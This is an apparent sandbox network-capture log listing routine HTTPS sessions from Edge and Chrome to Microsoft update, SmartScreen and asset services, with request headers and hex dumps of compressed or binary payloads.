20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49810	23.218.232.185	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:22 UTC	614	OUT	GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1731815718&P2=404&P3=2&P4=aB25p7ZLpIV6qR6AlPFwsBus7nVonDr4vvYYiUEgHo3VnwULrw6GYe3VNhhMi6aGxRmwl6DxZDywB%2fDQKJzzIg%3d%3d HTTP/1.1 Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com Connection: keep-alive MS-CV: oNH1SYvcyi0Cf2mK5oHhtJ Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:22 UTC	1217	IN	HTTP/1.1 200 OK Content-Type: application/x-chrome-extension Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT Accept-Ranges: bytes ETag: "Gv3jDkaZdFLRHkoq2781zOehQE8=" Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.3 MS-CorrelationId: 707b364e-ad00-48e1-852f-8d42ca2d67f9 MS-RequestId: 9a672925-aa2d-49dd-a86a-a19b53392a0d MS-CV: amMYdDuLUY8XoPqwuchV3R.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET X-Powered-By: ARR/3.0 X-Powered-By: ASP.NET Content-Length: 11185 Cache-Control: public, max-age=86397 Date: Sun, 10 Nov 2024 03:55:22 GMT Alt-Svc: h3=":443"; ma=93600,h3-29=":443"; ma=93600,h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43" Connection: close Akamai-Request-BC: [a=23.193.38.11,b=636816673,c=g,n=US_TX_IRVING,o=20940] MSREGION: X-CCC: X-CID: 3 Akamai-GRN: 0.0b26c117.1731210922.25f50d21 Access-Control-Max-Age: 86400 Access-Control-Allow-Credentials: true Access-Control-Expose-Headers: Server,range,hdntl,hdnts,Akamai-Mon-Iucid-Ing,Akamai-Mon-Iucid-Del,Akamai-Request-BC Access-Control-Allow-Headers: origin,range,hdntl,hdnts,CMCD-Request,CMCD-Object,CMCD-Status,CMCD-Session Access-Control-Allow-Methods: GET,POST,OPTIONS Access-Control-Allow-Origin: *
2024-11-10 03:55:22 UTC	11185	IN	Data Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20 Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49809	13.91.96.185	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:22 UTC	734	OUT	POST /api/browser/edge/data/toptraffic/3 HTTP/1.1 Host: data-edge.smartscreen.microsoft.com Connection: keep-alive Content-Length: 746 Accept: application/octet-stream;application/x-patch-bsdiff; Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoiN2w5d1l4b1d4ekNmZnA2VUtZMjVXUT09IiwgImhhc2giOiIzbHR0NFl4dE84MD0ifQ== Content-Type: application/json; charset=utf-8 If-None-Match: "170540185939602997400506234197983529371" Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br
2024-11-10 03:55:22 UTC	746	OUT	Data Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
2024-11-10 03:55:23 UTC	252	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:22 GMT Content-Type: application/octet-stream Content-Length: 460992 Connection: close Server: Kestrel ETag: "638004170464094982" Request-Context: appId=cid-v1:3d5e3eff-de07-43c3-a15d-06b05ff513c8
2024-11-10 03:55:23 UTC	16132	IN	Data Raw: 00 01 b7 32 6c 49 bd 35 18 3c 43 00 3b d3 7b 9a 00 08 16 f5 5f 2b 6a 45 e7 a6 60 9a c2 7d 9c 16 00 0c 2d 9e cc 04 23 e9 41 f4 82 16 a9 4b 52 db 00 0c 6c e3 4d 30 2c 73 87 bc fb 29 94 39 d4 c2 00 0c b4 d9 e2 eb e5 8f d8 b5 78 ca fa c6 82 9e 00 0c da 46 f1 62 1d cd 1e ab c5 cd 6a 55 ed dc 00 0e 79 d2 8a 68 27 a0 d5 e5 e5 89 bf 4c 3c 1f 00 12 2a 1f c4 5a 99 f8 2a 25 e9 2a 92 1a f6 5f 00 14 b2 67 12 34 79 75 12 bc d6 99 a8 99 1c cc 00 14 c8 bf 10 27 63 3d b9 cd 49 30 99 bf d3 a1 00 17 f8 9d 81 a3 94 71 57 f8 bf 3c 3a 4e ba d2 00 1a 3c bc a6 55 f9 2c 4d 69 94 e9 c9 5f b9 8c 00 1f 17 b3 27 28 0e f5 55 df 39 10 21 05 ce 96 00 1f bc ff bf d8 75 92 d1 13 89 37 0b 86 dc 34 00 20 98 bc 45 61 f8 b8 0d 34 2e 2b fb 37 39 6b 00 21 54 ca 2d 35 57 fb 9f 21 b8 d7 9a 40 2b Data Ascii: 2lI5<C;{_+jE`}-#AKRlM0,s)9xFbjUyh'L<Z%*_g4yu'c=I0qW<:N<U,Mi_'(U9!u74 Ea4.+79k!T-5W!@+
2024-11-10 03:55:23 UTC	16384	IN	Data Raw: b8 6c 65 b5 81 d7 e8 96 a2 f6 fb f5 08 e9 4a 27 41 5a ef 9e 20 88 b1 dd 92 43 f1 c7 08 f6 31 2a b4 6b b0 d0 7b af f2 6e c0 3b 30 49 08 f7 14 46 2e c2 8e a1 9b 56 f6 89 ff 89 a1 a1 08 f8 86 49 94 74 f7 df c7 92 d3 f1 d5 09 db a4 08 f9 bb 85 2c 48 b7 6a b2 fe 9c 06 4c 91 ba af 08 fb 12 e5 67 95 f2 51 95 31 42 c4 14 92 6c 77 08 fb aa 20 c5 0c 96 4a 9a 6f 2e 40 d4 2b fd 90 08 fe aa 92 f9 b3 b3 8f b8 65 27 9b b9 df 14 f7 09 00 34 db 44 0d dd 66 70 53 8f 0b 31 18 8b ba 09 05 38 28 fa 80 5f eb 56 83 46 d1 dd 83 34 b7 09 06 35 0d 42 c1 3f 91 ee 97 ed f4 31 68 37 32 09 08 35 c9 14 24 10 2f b5 80 ac f7 9a 16 e6 e2 09 08 7a 82 38 a3 08 0b 00 2c 62 9c d0 2e d2 c4 09 09 d1 da a7 a8 16 cd 89 e5 ac fe b9 cc 8e 69 09 0e 20 d3 38 58 e2 6b 84 a1 e7 75 97 ad 75 61 09 0e 4d Data Ascii: leJ'AZ C1*k{n;0IF.VIt,HjLgQ1Blw Jo.@+e'4DfpS18(_VF45B?1h725$/z8,b.i 8XkuuaM
2024-11-10 03:55:23 UTC	16384	IN	Data Raw: 88 ca 0d 74 ff b7 03 d5 0b 17 29 2e 12 86 39 8d 65 51 d1 6b 43 f6 37 a6 5e 4e 7e d5 12 8c a6 4c a1 b4 9a f4 6b 69 49 eb 0d 33 90 eb 12 8f 60 36 ec 98 cd 7f 6a 59 fe c5 d1 d5 4b 38 12 92 da 96 3e 8a fd ee fb c5 ac d0 29 b4 8e 13 12 95 25 87 d8 33 f2 c0 16 e8 0f 63 67 d6 78 d1 12 96 03 01 99 d8 95 ea 2c 0a f8 85 62 05 db 93 12 96 52 aa 59 60 de e6 e9 8c 23 d4 b7 c1 34 3d 12 96 bf ae d0 b9 c2 92 db f1 41 07 61 b1 82 5d 12 97 53 89 b5 7c fd 88 82 19 c7 b1 b0 0f af ed 12 98 30 32 6a a5 03 4e 26 db 95 be 1b a9 a3 e2 12 9a ea fe 35 92 c8 f4 3b 7a 18 36 80 cb 78 bf 12 9b 33 a3 9e d9 7b 54 c8 7b da 3b ed a8 dd 25 12 9b 98 d3 83 cc 49 8e 52 58 13 7e 3f 04 d9 af 12 9c 0d 11 dc 93 65 32 c4 f0 f6 a9 12 25 13 25 12 9c 28 31 10 8a f9 38 40 df 1f 08 9f 08 d4 71 12 9f 71 Data Ascii: t).9eQkC7^N~LkiI3`6jYK8>)%3cgx,bRY`#4=Aa]S\|02jN&5;z6x3{T{;%IRX~?e2%%(18@qq
2024-11-10 03:55:23 UTC	16384	IN	Data Raw: 8c e6 1b 88 d1 53 7d a1 f2 bc f6 d3 1b bd 38 be aa 88 bb f2 1c 05 de ac 2c b3 63 c3 1b bf d8 bc e5 a8 4c 42 a1 5e 7d 76 56 07 18 dd 1b c1 05 6e 7a a0 f3 27 8e eb 4f 29 e6 e0 a0 2a 1b c2 a1 45 60 4f 19 d0 fa 94 66 c2 31 56 e0 ac 1b c3 58 61 04 7c 91 76 1b 27 0c 2e 05 4d 26 17 1b c4 0f 81 e0 48 ff 13 e9 e7 fd ae 77 76 47 85 1b c5 d5 9a 68 ef 46 53 52 de 8b 1c 3a 7b 4f 53 1b cc c2 c4 df 4d dc 18 9f 1a a6 aa 47 f5 9f 2e 1b cd 8c 32 11 55 08 6c 9c 2f 0b 09 34 58 ca d2 1b cf 2c 48 15 0b dd b9 a9 cc 90 e8 14 76 e1 c7 1b d1 50 e1 1f 03 b2 ff 0f ab b3 c3 a2 cf c2 1a 1b d6 7a 97 41 b9 a0 2a 37 7b ba 9a 0a 00 47 56 1b da a2 08 31 23 96 3c 24 0a b0 10 2f 5e b6 c3 1b dc 15 6b ce f9 b8 64 db f8 fb 84 2a d6 02 9b 1b dc 58 1e e3 44 3f fb c2 e7 7f 97 d4 41 5f 1c 1b dc 83 Data Ascii: S}8,cLB^}vVnz'O)E`Of1VXa\|v'.M&HwvGhFSR:{OSMG.2Ul/4X,HvPzA7{GV1#<$/^kd*XD?A_
2024-11-10 03:55:23 UTC	16384	IN	Data Raw: 9c f0 8f 05 68 32 cf 23 af 0f e9 31 25 17 e2 83 8c a0 e0 45 41 22 69 ae 51 16 97 9e 25 19 94 88 65 65 22 da 5c e4 68 67 07 cf 5f 7a 25 1e 6a 2e 6e bf 40 39 a7 91 dd 9f 82 5c b4 be 25 21 01 14 90 ab fe fa c5 d4 0a 62 0b cd 30 e1 25 21 03 7a 48 db 3d 1f b8 bc 66 91 12 c8 41 7f 25 24 00 6f 09 69 7b 22 bc d0 5a 82 9d c8 cb 00 25 24 76 95 60 1f 20 bf 51 8e ef 43 af 74 27 17 25 24 d0 90 ec 4d 35 f3 3b 75 d1 b6 56 62 63 3e 25 25 bd 14 86 f0 f0 dc 12 c9 55 32 f1 85 66 4f 25 25 de ea a2 0c 7b b9 31 02 c3 fc 10 0f 92 23 25 27 0a 2e 12 37 63 79 36 e7 03 6f 4c 1e 67 7e 25 29 ef 20 dd 60 cb e0 1f 91 82 96 c4 38 ef d3 25 2c 0d 19 1e 65 a3 27 9b 58 e2 44 e3 80 93 37 25 2c e2 18 e3 78 51 0e b2 f9 62 26 e5 78 8f 9f 25 36 84 bd bb 8f cc a6 bc 42 a8 bf 22 b0 f1 a9 25 3a 54 Data Ascii: h2#1%EA"iQ%ee"\hg_z%j.n@9\%!b0%!zH=fA%$oi{"Z%$v` QCt'%$M5;uVbc>%%U2fO%%{1#%'.7cy6oLg~%) `8%,e'XD7%,xQb&x%6B"%:T
2024-11-10 03:55:23 UTC	16384	IN	Data Raw: b6 07 8f 44 9d 29 36 4f 29 8a 7d 80 2e 1d 98 b7 c7 17 54 cd a1 2b c2 e9 29 21 98 f9 2e 1f 4a 0d ee 13 3f 5a 00 ff e7 0d f0 d4 1c 86 2e 21 27 d4 ff 4a 83 22 1e 86 3f 93 6b 62 a1 0e 2e 25 e1 37 a1 70 d4 f6 b3 17 bd e9 dd 8d 2a 44 2e 26 32 0d f4 82 4c f6 14 9e 97 92 23 fa 52 37 2e 2a 40 96 f4 4d 34 89 21 f2 49 39 e8 d3 d3 19 2e 2b ef 39 f1 8a 4a 7e 28 b9 d0 be 00 6f 35 68 2e 2e 95 d3 bd e3 e7 a0 d6 d0 25 5e 0d b7 b5 a5 2e 31 ce 53 a9 54 e0 3b 3c 2f fc 4d eb 0f a5 e1 2e 33 1e 46 e8 3a 01 30 91 17 49 f3 33 11 46 79 2e 36 b7 bb 07 e4 6d 92 d5 42 49 d7 e5 49 f4 85 2e 36 e8 96 57 36 97 bb 40 7a 3b ca 8a e0 7e 53 2e 3a 1e f2 97 75 d6 ae 4f f5 85 eb 36 38 65 e5 2e 3a 59 df c9 6e 75 92 ac 40 ac 59 a6 fd e4 1c 2e 3b 8e 5c 94 1d 75 39 54 06 13 6b 6e 7f ef 30 2e 43 e8 Data Ascii: D)6O)}.T+)!.J?Z.!'J"?kb.%7pD.&2L#R7.@M4!I9.+9J~(o5h..%^.1ST;</M.3F:0I3Fy.6mBII.6W6@z;~S.:uO68e.:Ynu@Y.;\u9Tkn0.C
2024-11-10 03:55:23 UTC	16384	IN	Data Raw: 02 f3 ca e4 05 cb a0 be 15 69 62 32 37 3c 37 3b db 81 8a b2 df cf ef b1 79 3f f8 ae 37 3d a3 01 e8 95 76 a1 63 78 77 2e 93 42 3d 4f 37 3e c4 08 a5 37 4f 84 43 dc 19 00 a9 8f 2e 0d 37 3f 82 55 cb cd 06 b9 0c 0d 94 f9 4f d6 82 e8 37 44 09 28 b8 33 ef b7 ee 6b 4c 90 ee e0 d1 3a 37 44 83 9a 56 2d 6a 58 ea 6b e5 8f 6a 1d 17 23 37 47 0f 55 f8 2b 1c 30 89 3a 1d e2 21 89 b7 42 37 4b 86 38 d0 cd 9f 96 62 d8 da bf d5 15 ed cb 37 4e 81 34 2b 0e ea ab 6f ae 29 15 59 32 ae 46 37 50 d2 0c 2a e2 ca 59 ec 21 86 70 f9 7a 6c d1 37 55 32 b2 91 f0 e7 b8 47 d0 f7 0f 64 90 d9 51 37 56 ce 44 24 61 58 d7 f8 d4 0d 8b fe 3d b0 27 37 58 1f 24 d2 a5 24 9c d7 5c 5a 71 f9 e9 f2 a3 37 58 9d d0 f0 06 3a 05 be 08 d9 90 bc 18 0d 71 37 5d 04 71 81 05 8e b6 9b 24 f2 54 35 1b 18 46 37 62 eb Data Ascii: ib27<7;y?7=vcxw.B=O7>7OC.7?UO7D(3kL:7DV-jXkj#7GU+0:!B7K8b7N4+o)Y2F7P*Y!pzl7U2GdQ7VD$aX='7X$$\Zq7X:q7]q$T5F7b
2024-11-10 03:55:23 UTC	16384	IN	Data Raw: 30 9b b9 2f 98 88 40 3b cc 98 d2 59 40 6d c4 d7 67 2a f1 8a f6 d5 d3 92 a9 c6 13 1d 40 71 5f 29 26 14 e2 86 f2 b1 3c d6 fc 07 07 4a 40 77 d4 86 06 be 80 6f b2 fd e4 19 fe 6b 6a 94 40 78 4d f5 b9 67 58 78 83 29 63 04 29 22 98 8d 40 7a 85 3f 10 18 78 19 d3 be 45 8d 0e 49 7b bb 40 7b 5d c5 55 97 e5 9d 35 9d 27 93 51 1d be 21 40 7d 42 88 f1 ca 9d ba 2a 28 3a f8 72 71 ba c7 40 7e 4d cf f4 13 b8 8f f1 9c e6 e4 a8 50 74 d0 40 80 bb 51 db 04 52 b7 b2 f3 5f dc db 6d 4b de 40 88 e2 91 a0 6c 67 8c d2 0b 9f d2 91 ca 6d 22 40 8a b9 d3 6a f9 07 64 05 ea 52 dc 44 82 0b 38 40 8b 54 ce 67 df 8c a3 48 2d 96 f6 ed e4 cf 78 40 8e 78 fd f9 d7 db ac 12 a0 80 27 db 9f 14 42 40 90 00 78 66 ff 66 2b 58 9f 18 13 aa 3d 6e b3 40 90 fa a1 0b 8e ee 2b 73 4b 59 c6 c9 b1 84 9b 40 93 53 Data Ascii: 0/@;Y@mg@q_)&<J@wokj@xMgXx)c)"@z?xEI{@{]U5'Q!@}B(:rq@~MPt@QR_mK@lgm"@jdRD8@TgH-x@x'B@xff+X=n@+sKY@S
2024-11-10 03:55:23 UTC	16384	IN	Data Raw: 66 82 7d 26 60 5e 84 ec 72 2a af 39 49 bb 12 c2 0a 6a 68 a1 f1 aa 3c 93 f9 79 13 0e 49 bb 81 dd 8c 7e 5d 19 6b 54 60 33 c1 1e 70 56 49 bc df 84 ed 14 a3 5d 07 06 25 84 6a 95 02 e0 49 bd eb 48 24 83 1e f1 e0 29 fe 9e e6 22 da 07 49 c1 2d 65 e8 79 f6 32 c8 9b 5b 3f 1a a8 9d b9 49 c4 33 af 97 7a e9 a1 ba ed 12 d0 a3 40 1e 42 49 c5 09 f1 9f 2c bb 61 75 14 cf 80 9c 0e 85 9e 49 c8 81 16 cb ae 60 54 25 eb 75 fe e4 b5 16 8c 49 cc 62 7c 10 80 46 f7 71 86 18 7b bd ea 45 5f 49 cd ad e9 e7 ee e9 a2 7e 24 2e 10 93 70 b0 ad 49 d1 bc ac 01 05 b1 9b be b4 f8 4e e6 0c 0d ac 49 d2 4b be 25 0a bd 70 d0 f7 10 c2 d7 38 8b f2 49 d4 c5 71 4c 7f 7a 2a 83 c3 c3 50 d2 c2 4c 3e 49 d5 40 eb ee b7 40 f4 16 fe b4 e7 35 d0 25 e3 49 d6 e7 89 68 04 ba a1 f5 37 3f 51 0a 5e cc 25 49 da b4 Data Ascii: f}&`^r9Ijh<yI~]kT`3pVI]%jIH$)"I-ey2[?I3z@BI,auI`T%uIb\|Fq{E_I~$.pINIK%p8IqLzPL>I@@5%Ih7?Q^%I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49812	13.107.246.57	443	7276	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:22 UTC	711	OUT	GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: EntityExtractionDomainsConfig Sec-Mesh-Client-Edge-Version: 117.0.2045.47 Sec-Mesh-Client-Edge-Channel: stable Sec-Mesh-Client-OS: Windows Sec-Mesh-Client-OS-Version: 10.0.19045 Sec-Mesh-Client-Arch: x86_64 Sec-Mesh-Client-WebView: 0 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:23 UTC	576	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:22 GMT Content-Type: application/octet-stream Content-Length: 70207 Connection: close Content-Encoding: gzip Last-Modified: Thu, 07 Nov 2024 20:03:34 GMT ETag: 0x8DCFF6742E8F24C x-ms-request-id: efca23cb-901e-0062-69eb-322fdf000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241110T035522Z-15869dbbcc6lq45jhC1DFWbkc800000005u000000000fhkw Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-10 03:55:23 UTC	15808	IN	Data Raw: 1f 8b 08 08 16 1d 2d 67 02 ff 61 73 73 65 74 00 ec bd 0b 97 db 36 b2 30 f8 57 b2 b9 33 b3 dd 89 d5 d6 5b dd d9 cd fa f4 d3 f1 f8 39 6d 3b 19 db f1 d5 01 49 48 a2 45 91 0c 1f 6a ab c3 be bf 7d 0b 05 80 00 08 50 52 db ce 77 ef b7 67 67 9c 16 09 14 0a 40 a1 50 a8 2a 14 c0 3f bf f7 93 78 16 ce bf ff e9 bb 3f bf 2f 92 25 8d a7 51 b8 0a 0b 78 ef 8d bb dd 07 df 7d 9f 92 39 9d fa 65 91 cc 66 90 38 1c f4 59 62 40 67 a4 8c 8a 69 94 f8 24 a2 d3 15 49 11 81 c7 f0 c0 df 0e 3c 00 94 97 e3 6b de f1 08 7b a5 11 7b a5 51 67 9e e1 6b 8c af 71 a7 cc f1 15 81 69 de 59 7d c6 d7 02 5f 8b 0e a5 ec d5 c7 5c 3f ef f8 b7 ec 35 20 ec 35 20 9d 60 89 af 14 5f 69 27 40 e0 19 e6 ce 48 27 c4 8a 66 21 be 86 1d 78 60 af 19 be 66 9d 19 e6 2e b0 ec 82 76 c2 08 5f 31 77 91 75 16 3c b7 c4 d7 Data Ascii: -gasset60W3[9m;IHEj}PRwgg@P*?x?/%Qx}9ef8Yb@gi$I<k{{QgkqiY}_\?5 5 `_i'@H'f!x`f.v_1wu<
2024-11-10 03:55:23 UTC	16384	IN	Data Raw: c5 f3 e8 07 bb 82 71 ba da 2a 0b c7 62 2c 30 96 c2 52 09 74 65 c0 2a 8a c3 88 95 9c 7c 3e a9 79 09 d4 fa 9a 9f 30 4a 49 28 2b d7 97 ff 7a 7b f9 fa cd f4 c9 05 68 2b 37 9c c1 08 01 cb 2f 28 f3 02 34 de 08 0c a6 34 da 38 c6 ec 48 27 33 28 96 9f 45 d9 4f 9f 12 f7 54 d2 47 a6 39 87 08 81 e9 6d 4f c1 43 97 10 bf ad 59 55 67 39 13 fe 1e 05 67 65 16 87 6c 9b f5 cb 90 60 eb 3d ea 25 09 33 8b f9 4a fb 10 ef 11 3b 7c e8 61 60 14 a0 60 b9 7c 16 e7 69 54 b1 c3 22 c0 e0 29 df c2 05 4c 8f bc f0 67 5e 04 75 33 51 9a b7 e1 61 1a 61 48 f5 c3 30 f7 62 91 d5 a8 34 39 2a 97 ff 2d f5 aa c1 c2 6c 78 e0 35 33 d1 42 b3 75 c4 be 3b f4 d0 68 83 51 a7 81 2d a0 ff 0d 5d 10 62 ed 7f 55 a5 99 9f 25 2b 2f a4 4d 09 21 65 43 c7 04 cf 93 19 f3 c1 d0 b6 e9 14 38 59 31 29 8b 4d 52 3a c4 97 Data Ascii: qb,0Rte\|>y0JI(+z{h+7/(448H'3(EOTG9mOCYUg9gel`=%3J;\|a``\|iT")Lg^u3QaaH0b49*-lx53Bu;hQ-]bU%+/M!eC8Y1)MR:
2024-11-10 03:55:23 UTC	16384	IN	Data Raw: c1 f4 52 a7 67 b3 99 ff bc b7 c2 8e 7c d3 4d 9a a5 bf dc f0 20 15 b1 bc 1f 82 9a 8d 98 a7 af db 80 6b 74 e7 ab 7c e6 18 7d 9a 2b 3e 34 2d 1a e7 c0 d5 e8 b4 a0 0e d4 7d 19 bb 69 52 58 a2 33 32 78 db 4b 2d cd 54 dd d2 2b 9c a0 29 69 1a ba 4a ee 0a 4d 33 5a 7b a7 1a 83 5f f3 f7 fe 2c 2f 84 3b 39 d0 56 82 ef 75 a4 f3 69 57 af 58 09 8c 2a 1d 24 b9 4e 6b cf 63 d0 74 99 e3 02 0f 26 7f 1a 86 a9 a8 69 fa 5a d8 25 83 c1 ea f8 fd 12 62 16 86 38 17 5a 19 6f 13 03 00 e6 6a 07 a4 40 be bb 20 de a6 de bf d1 06 75 32 1f c3 4f 67 41 ad 31 bd b0 9c ee 44 47 33 2a 92 9c d3 f6 35 64 a9 b1 d3 f6 b1 c7 a7 b4 80 af ea c1 2a 6c dd 81 a0 0b 67 ca d2 b2 11 7c 8d dc 39 47 56 d1 bd 08 e8 ec 3e 4f c9 56 d6 7a d3 9a 56 4d 17 50 41 9b 17 9b 37 36 da 2e 7c a4 ba 63 f5 72 cd 6b 58 b5 9b Data Ascii: Rg\|M kt\|}+>4-}iRX32xK-T+)iJM3Z{_,/;9VuiWX$Nkct&iZ%b8Zoj@ u2OgA1DG35d*lg\|9GV>OVzVMPA76.\|crkX
2024-11-10 03:55:23 UTC	16384	IN	Data Raw: 41 9e 48 c8 71 d7 39 94 dd f7 b6 3f 2a 48 d1 b5 2e 37 a4 97 5f 43 54 c9 8d d7 76 7a 14 e4 6f 3b 80 f7 6a 61 e8 6f 47 e9 2d cb 60 84 66 2b c0 b9 77 09 1b c0 32 5c aa 6c 0e 25 81 ed a0 5e 61 25 37 6f 3c a5 bc 1f 04 1a dd b1 04 1d c9 73 16 3a 58 a8 69 4d 12 c1 5e e9 66 5f 14 6c e4 9e d4 61 25 e1 2f c3 fc b8 ed df 80 5d 2b 3a 5b 4c 56 c9 72 1f 59 1d 6a 72 0b d2 b0 4c 8e d5 67 db 16 79 41 90 65 4f 4b 68 63 f6 d1 e5 db b6 6a 18 e6 ca 5f 04 79 2e 71 69 5d 0e 19 cc d9 f6 58 27 58 af 1c 18 04 f1 98 d2 bf 15 1e 37 ce e0 1e 88 54 83 3c 82 f8 a8 05 5f b0 1b 3f 2f 02 8f 31 a4 e9 1d ed 45 e6 e4 85 e6 b9 66 4c fd cd 8d e4 58 f7 79 73 8b 47 40 25 b6 0d 7f 78 ff a8 fe e7 7d 69 4a fc 00 c7 b0 37 a9 44 f0 40 1e e8 bd 41 8a b4 0a 5d 5a 2c 0e 60 f7 fb 81 3b 35 42 38 50 3b bc Data Ascii: AHq9?*H.7_CTvzo;jaoG-`f+w2\l%^a%7o<s:XiM^f_la%/]+:[LVrYjrLgyAeOKhcj_y.qi]X'X7T<_?/1EfLXysG@%x}iJ7D@A]Z,`;5B8P;
2024-11-10 03:55:23 UTC	5247	IN	Data Raw: 9a 2a 83 ab 27 93 58 c5 2b d2 9c af 2b 4e 0f 79 ac a9 56 57 20 b1 61 ca d2 f5 ed 38 df 10 b9 60 88 4c 48 ac b1 cd 10 b5 8f 76 49 19 f2 b6 d5 54 1d d1 9c b1 20 7a d3 64 f7 91 a2 0c 4d 73 6d e0 da be ee e6 87 03 9f 5e f7 4f 98 9c 12 cd 88 68 4c 2e b1 48 00 60 c3 31 74 31 8d 87 b4 32 56 02 4f bf e1 a9 3b c0 40 d6 24 8e 10 55 c7 c3 e7 8c f3 78 28 78 d3 94 de b0 5a 4d 22 eb 28 5c 22 00 98 8e 15 1a f8 ab ac 54 f4 5d 80 d0 a5 aa 6e 87 83 fd d6 f1 b0 c0 82 f7 f4 5e ef 2f 2b b8 62 a2 13 a1 4d ae 60 cf 59 3c b1 b1 f4 40 4d 41 74 7c ac 2c 5a 9e ef f4 d2 81 6d 69 e1 d3 8b 73 2c 84 2c 06 37 fd 72 38 10 a5 b2 13 51 f1 a0 a2 06 7d 3f 89 8f 72 35 a0 58 a0 46 79 2f b7 1f cc 57 92 ec c8 b4 b5 f2 5c 65 e7 30 5a 93 e3 b1 8e 5f f5 